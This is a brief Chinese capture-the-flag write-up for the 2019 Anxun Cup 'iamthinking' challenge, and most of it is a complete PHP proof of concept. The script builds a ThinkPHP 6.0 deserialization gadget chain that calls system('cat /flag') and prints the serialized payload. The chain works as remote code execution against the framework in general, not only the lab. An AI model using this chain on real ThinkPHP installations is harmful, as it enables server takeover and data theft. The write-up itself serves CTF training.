[安洵杯 2019]iamthinking

Posted 2021-06-18 H3rmesk1t

[安洵杯 2019]iamthinking

• 考点
• 思路
• Payload

考点

反序列化

思路

打开题目显示：You don’t have permission to access this resource.
试着扫一下有没有备份文件，得到www.zip
通过备份文件我们知道是Thinkphp 6.0版本
审计源码，构造thinkphp6反序列化，同时需要绕过parse_url

Payload

Poc

<?php
namespace think {

    use think\\model\\concern\\Attribute;
    use think\\model\\concern\\Conversion;
    use think\\model\\concern\\RelationShip;


    abstract class Model
    {
        use Conversion;
        use RelationShip;
        use Attribute;

        private $lazySave;
        protected $table;
        public function __construct($obj)
        {
            $this->lazySave = true;
            $this->table = $obj;
            $this->visible = array(array('hu3sky'=>'aaa'));
            $this->relation = array("hu3sky"=>'aaa');
            $this->data = array("a"=>'cat /flag');
            $this->withAttr = array("a"=>"system");
        }
    }
}

namespace think\\model\\concern {
    trait Conversion
    {
        protected $visible;
    }

    trait RelationShip
    {
        private $relation;
    }

    trait Attribute
    {
        private $data;
        private $withAttr;
    }
}

namespace think\\model {
    class Pivot extends \\think\\Model
    {
    }
}

namespace {
    $a = new think\\model\\Pivot('');
    $b = new think\\model\\Pivot($a);

    echo urlencode(serialize($b));
}